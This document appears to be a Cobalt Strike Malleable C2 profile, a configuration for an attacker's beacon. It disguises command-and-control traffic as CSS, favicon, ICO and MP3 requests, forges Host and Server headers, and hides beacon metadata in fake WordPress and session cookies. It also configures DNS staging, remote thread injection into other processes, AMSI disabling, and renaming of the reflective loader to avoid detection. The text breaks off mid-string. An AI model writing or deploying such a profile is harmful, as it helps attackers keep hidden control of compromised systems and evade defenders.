set sample_name "c3a22d29"; set sleeptime "59252"; set jitter "41"; set tcp_port "9904"; set useragent "Mozilla/5.0 (Linux; Android 8.0.0; SM-G960F Build/R16NW) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202"; set dns_idle "34.168.114.114"; set dns_stager_subhost "ns1."; set maxdns "240"; set dns_sleep "112"; set dns_ttl "3600"; set dns_max_txt "252"; set pipename "npfs_##"; set pipename_stager "rpc_##"; https-certificate { set CN "comsats"; set O "dep"; set L "isb"; set ST "pu"; set C "pk"; set validity "20"; } http-config { header "Server" "golfe2"; } http-get "default" { set uri "/RELEASE_NOTES.css /kj.css"; client { header "Host" "google.com"; header "Connection" "close"; header "Accept-Encoding" "gzip"; metadata { mask; base64; prepend "wordpress_logged_in="; header "Cookie"; } parameter "profiler" "false"; } server { header "Connection" "close"; header "Content-Type" "text/css"; header "Server" "apache"; output { netbios; base64; prepend "html{line-height:1.15;-webkit-text-size-adjust:100%}body{margin:0}main{display:block}h1{font-size:2em;margin:.67em 0}hr{box-sizing:content-box;height:0;overflow:visible}pre{font-family:monospace,monospace;font-size:1em}a{background-color:transparent}abbr[title]{border-bottom:none;text-decoration:underline;text-decoration:underline dotted}b,strong{font-weight:bolder}code,kbd,samp{font-family:monospace,monospace;font-size:1em}small{font-size:80%}sub,sup{font-size:75%;line-height:0;position:relative;vertical-align:baseline}sub{bottom:-.25em}sup{top:-.5em}img{border-style:none}button,input,optgroup,select,textarea{font-family:inherit;font-size:100%;line-height:1.15;margin:0}button,input{overflow:visible}button,select{text-transform:none}[type=button],[type=reset],[type=submit],button{-webkit-appearance:button}[type=button]::-moz-focus-inner,[type=reset]::-moz-focus-inner,[type=submit]::-moz-focus-inner,button::-moz-focus-inner{border-style:none;padding:0}[type=button]:-m"; print; } } } http-post "default" { set uri "/copyright"; client { header "Host" "google.com"; header "Connection" "close"; header "Content-Type" "text/plain"; output { base64url; base64; print; } id { base64; prepend "__session__id="; header "Cookie"; } } server { header "Status" "200"; header "Connection" "close"; header "Server" "Pagely Gateway/1.5.1"; output { base64; print; } } } http-stager "default" { set uri_x86 "/static-directory/tab_shop_active.ico"; set uri_x64 "/files/fr.ico"; client { header "Host" "google.com"; header "Connection" "close"; header "Accept" "image/jpeg"; header "Accept-Encoding" "gzip, br"; } server { header "Content-Type" "image/x-icon"; header "Server" "cloudflare"; header "Connection" "close"; output { print; } } } stage { set checksum "4"; set userwx "false"; set image_size_x86 "561664"; set image_size_x64 "540961"; set sleep_mask "true"; set cleanup "true"; set stomppe "true"; set obfuscate "true"; set compile_time "08 Jan 2021 13:57:24"; set entry_point "81369"; set name "debugsafely.dll"; transform-x86 { prepend "\x90\x90\x90\x90"; strrep "ReflectiveLoader" "DebugSafely"; } transform-x64 { prepend "\x90\x90\x90\x90"; strrep "ReflectiveLoader" "DebugSafely"; } } process-inject { set allocator "VirtualAllocEx"; set min_alloc "16733"; set userwx "false"; set startrwx "false"; transform-x86 { prepend "\x90\x90\x90\x90\x90"; } transform-x64 { prepend "\x90\x90\x90\x90\x90"; } execute { CreateThread; RtlCreateUserThread; CreateRemoteThread; } } post-ex { set spawnto_x86 "%windir%\\syswow64\\WUAUCLT.exe"; set spawnto_x64 "%windir%\\sysnative\\WUAUCLT.exe"; set obfuscate "true"; set smartinject "true"; set amsi_disable "true"; } http-get "variant_1" { set uri "/bn.css /faq.css"; client { header "Host" "google.com"; header "Connection" "close"; metadata { base64url; base64; prepend "woocommerce_items_in_cart="; header "Cookie"; } parameter "invoice" "true"; } server { header "Connection" "close"; header "Content-Type" "text/css"; header "Server" "golfe2"; output { base64; base64; prepend "@import url(/t/1.css?apiType=css&projectid=6e7eef0e-28ec-43c0-a707-f08a1eb1c6b9);@font-face{font-family:'StymieW01-BoldCondensed';src:url('/dv2/2/d06fb800-a3e7-4a04-b8b8-a1f5d23f4439.eot?d44f19a684109620e4841579ae90e818937f0df4d514ffe0d3e3e57723a4125208f710b15d5bd87a20be5922b56a3a06b0f26ae7d930583a24007f936f67b82ff92d0c643f2b648064a59cc1c28679e075ed12931c5b949e1e9478c09bb8b5fb94f462c6c3a419e45e785b0869&projectId=6e7eef0e-28ec-43c0-a707-f08a1eb1c6b9#iefix');src:url('/dv2/2/d06fb800-a3e7-4a04-b8b8-a1f5d23f4439.eot?d44f19a684109620e4841579ae90e818937f0df4d514ffe0d3e3e57723a4125208f710b15d5bd87a20be5922b56a3a06b0f26ae7d930583a24007f936f67b82ff92d0c643f2b648064a59cc1c28679e075ed12931c5b949e1e9478c09bb8b5fb94f462c6c3a419e45e785b0869&projectId=6e7eef0e-28ec-43c0-a707-f08a1eb1c6b9#iefix') format('eot'),url('/dv2/14/917cefa0-8659-4ad4-a4bf-b0ec714d1cfb.woff2?d44f19a684109620e4841579ae90e818937f0df4d514ffe0d3e3e57723a4125208f710b15d5bd87a20be5922b56a3a06b0f26ae7d930583a24007f936f67b82ff92d0c643f2b648064a59cc1c28679e075ed12931c5b949e1e9478c09bb8b5fb94f462c6c3a419e45e785b0869&projectId=6e7eef0e-28ec-43c0-a707-f08a1eb1c6b9') format('woff2'),url('/dv2/3/065df875-84bb-45cd-afa3-d42b170797be.woff?d44f19a684109620e4841579ae90e818937f0df4d514ffe0d3e3e57723a4125208f710b15d5bd87a20be5922b56a3a06b0f26ae7d930583a24007f936f67b82ff92d0c643f2b648064a59cc1c28679e075ed12931c5b949e1e9478c09bb8b5fb94f462c6c3a419e45e785b0869&projectId=6e7eef0e-28ec-43c0-a707-f08a1eb1c6b9') format('woff'),url('/dv2/1/cababd22-b9ea-4e13-90dd-cd914957484d.ttf?d44f19a684109620e4841579ae90e818937f0df4d514ffe0d3e3e57723a4125208f710b15d5bd87a20be5922b56a3a06b0f26ae7d930583a24007f936f67b82ff92d0c643f2b648064a59cc1c28679e075ed12931c5b949e1e9478c09bb8b5fb94f462c6c3a419e45e785b0869&projectId=6e"; print; } } } http-post "variant_1" { set uri "/fam_calendar /favicon"; client { header "Host" "google.com"; header "Connection" "close"; header "Content-Type" "text/plain"; output { base64; base64; print; } id { base64; prepend "__session__id="; header "Cookie"; } } server { header "Status" "200"; header "Connection" "close"; header "Server" "ESF"; output { base64; print; } } } http-stager "variant_1" { set uri_x86 "/wp-includes/an.mp3"; set uri_x64 "/static-directory/logo.mp3"; client { header "Host" "google.com"; header "Connection" "close"; header "Accept" "image/jpeg"; header "Accept-Language" "fr-CH, fr;q=0.9, en;q=0.8, de;q=0.7, *;q=0.5"; } server { header "Content-Type" "audio/mpeg"; header "Server" "golfe2"; header "Connection" "close"; output { print; } } } http-get "variant_2" { set uri "/avatars /language"; client { header "Host" "google.com"; header "Connection" "close"; metadata { base64; base64; prepend "HSID="; header "Cookie"; } } server { header "Connection" "close"; header "Content-Type" "text/html"; header "Server" "nginx"; output { mask; base64; prepend " Untitled Untitled